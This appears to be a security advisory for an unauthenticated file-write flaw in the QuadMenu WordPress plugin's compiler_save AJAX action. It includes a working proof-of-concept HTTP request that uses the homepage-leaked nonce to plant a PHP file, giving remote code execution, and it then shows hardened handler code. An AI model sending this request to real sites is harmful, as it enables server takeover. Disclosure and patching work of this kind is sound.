The compiler_save AJAX action, available to both authenticated and unauthenticated users, did not check the extension of the imported file, and the nonce used for its CSRF check was displayed on the homepage. This could allow unauthenticated users to create an arbitrary PHP file on the blog, leading to RCE.
Get the nonce from the homepage, i.e. var quadmenu = {"nonce":"b74eed0e4f","gutter":"30"};

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: example.com
User-Agent: YOLO
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 120
Connection: close

action=quadmenu_compiler_save&nonce=b74eed0e4f&output[imports][0]=info.php&output[css]=%3c%3fphp%20phpinfo()%3b%20%3f%3e

The created file will be located at /wp-content/uploads/<main-theme>/info.php (the path is in the response).
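As an added defender-side example (not the plugin's own code), this is how such a handler can be hardened: the action is restricted to administrators, the nonce is verified but not relied on for authorization, and every import filename is rejected unless it is a plain stylesheet name. The function names, the nonce action name and the extension allow-list are hypothetical.

```php
<?php
// Hardened replacement for a compiler_save-style AJAX handler (hypothetical names).
// Only files with these extensions may ever be written by the endpoint.
const QM_ALLOWED_EXT = array( 'css', 'scss', 'less' );

/**
 * Validate a client-supplied import filename.
 * Returns the sanitized basename, or false if it must be rejected.
 */
function qm_validate_import_name( $name ) {
    if ( ! is_string( $name ) || $name === '' ) {
        return false;
    }
    // Strip directory components so "../../x.php" cannot leave the target directory.
    $base  = basename( sanitize_file_name( $name ) );
    $parts = explode( '.', strtolower( $base ) );
    if ( count( $parts ) < 2 ) {
        return false; // no extension at all
    }
    $ext = array_pop( $parts );
    if ( ! in_array( $ext, QM_ALLOWED_EXT, true ) ) {
        return false; // "info.php" is rejected here
    }
    // Refuse "info.php.css" as well: some servers execute on the first extension.
    foreach ( $parts as $segment ) {
        if ( in_array( $segment, array( 'php', 'phtml', 'phar' ), true ) ) {
            return false;
        }
    }
    return $base;
}

function qm_compiler_save_handler() {
    // A nonce only proves intent, not identity; the original leaked it to
    // everyone, so the capability check is what actually closes the hole.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }
    check_ajax_referer( 'quadmenu_compiler', 'nonce' ); // hypothetical action name

    $imports = isset( $_POST['output']['imports'] ) ? (array) $_POST['output']['imports'] : array();
    foreach ( $imports as $import ) {
        if ( false === qm_validate_import_name( wp_unslash( $import ) ) ) {
            wp_send_json_error( 'invalid import filename', 400 );
        }
    }
    // ... write the compiled CSS under wp_upload_dir() using the validated names ...
    wp_send_json_success();
}
// Registered for logged-in users only: deliberately no wp_ajax_nopriv_ hook.
add_action( 'wp_ajax_quadmenu_compiler_save', 'qm_compiler_save_handler' );
```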
2021-02-22
2021-02-23